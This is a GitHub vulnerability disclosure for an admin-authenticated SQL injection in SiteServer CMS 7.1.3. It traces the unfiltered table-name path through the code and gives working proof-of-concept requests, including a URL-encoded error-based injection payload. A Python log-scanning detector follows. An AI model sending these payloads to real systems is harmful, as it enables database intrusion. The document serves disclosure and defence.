CVE-2022-44298: background admin sql inject · Issue #3492 · siteserver/cms

SiteServer CMS 7.1.3 is vulnerable to SQL Injection.


Vulnerability conditions

SSCMS v7.1.3 + MySQL + administrator privileges

Vulnerability details

1. Code auditing finds the entry point: in SSCMS.Web/Controllers/Admin/Settings/Sites/SitesTablesController.GetColumns.cs, the tablename value is used in a SQL statement call.

2. The controller calls the GetCount method of SSCMS.Core/Services/DatabaseManager.cs.

3. Execution then enters the Quote method of SSCMS.Core/Services/DatabaseManager.Parser.cs.

4. Database.cs (GetQuotedIdentifier) -> DbUtils.cs (GetQuotedIdentifier) -> MySqlImpl.cs (GetQuotedIdentifier) are called in turn. The value returned at the end of this chain has still not been filtered or otherwise sanitized before it is used in the SQL statement.

```
GET /api/admin/settings/sitesTables/1* HTTP/1.1
Host: 192.168.3.129
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Origin: http://192.168.3.129
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MDY1NDYwLCJleHAiOjE2NjYxNTE4NjAsImlhdCI6MTY2NjA2NTQ2MH0.C_5BVy0Tlv-s9n8Nq2zgummkzvn50prSoOefuRVhBR8
Referer: http://192.168.3.129/utils/search.html?word=1111
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I
Connection: close
```

poc in sqlmap

poc in burp
```
GET /api/admin/settings/sitesTables/%31%25%27%20%41%4e%44%20%47%54%49%44%5f%53%55%42%53%45%54%28%43%4f%4e%43%41%54%28%30%78%36%38%36%31%37%36%36%35%32%30%37%33%37%31%36%63%32%30%36%39%36%65%36%61%36%35%36%33%37%34%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%34%32%33%38%3d%34%32%33%38%2c%31%29%29%29%2c%30%78%37%31%36%62%37%31%36%62%37%31%29%2c%34%32%33%38%29%20%41%4e%44%20%27%72%6a%62%67%25%27%3d%27%72%6a%62%67 HTTP/1.1
Host: 192.168.3.129
Accept: application/json, text/plain, */*
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MTY2NTA0LCJleHAiOjE2NjYyNTI5MDQsImlhdCI6MTY2NjE2NjUwNH0.ZyaN5rNgUQxxkfxp3-GEV_e3RdiKPG4BjVFKBPZkdTU
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Origin: http://192.168.3.129
Referer: http://192.168.3.129/ss-admin/?siteId=57
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```
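For defenders reviewing web logs on an affected install, the following is an added detection example, not code from the issue or from SSCMS. It decodes the table-name segment of the sitesTables route and flags values that are not plain identifiers. It assumes an access log that records the raw request line in common/combined format and that legitimate table names contain only letters, digits and underscores; the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Route prefix taken from the requests above; the final path segment is the table name.
ROUTE = "/api/admin/settings/sitesTables/"
# Assumption: legitimate table names are plain SQL identifiers.
SAFE_TABLE = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")
# Request field of an access log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def table_segment(target):
    """Return the decoded table-name segment, or None for other routes."""
    path = target.split("?", 1)[0]
    if not path.lower().startswith(ROUTE.lower()):
        return None
    # Decode before matching: the Burp request above encodes every byte as %XX,
    # so searching the raw log line for quotes or SQL keywords finds nothing.
    return unquote(path[len(ROUTE):])


def suspicious_requests(log_lines):
    """Yield (line_number, decoded_segment) for table names that are not identifiers."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        segment = table_segment(match.group("target"))
        if segment and not SAFE_TABLE.fullmatch(segment):
            yield number, segment


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Oct/2022:10:00:01 +0000] "GET /api/admin/settings/sitesTables/siteserver_Content HTTP/1.1" 200 512',
    '10.0.0.9 - - [19/Oct/2022:10:00:07 +0000] "GET /api/admin/settings/sitesTables/%31%25%27%20%41%4e%44%20%31%3d%31 HTTP/1.1" 200 87',
    '10.0.0.5 - - [19/Oct/2022:10:00:09 +0000] "GET /api/admin/settings/sites HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, segment in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: non-identifier table name {segment!r}")
```

Because only one decoding pass is applied, a double-encoded value still contains `%` after decoding and is flagged as well.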
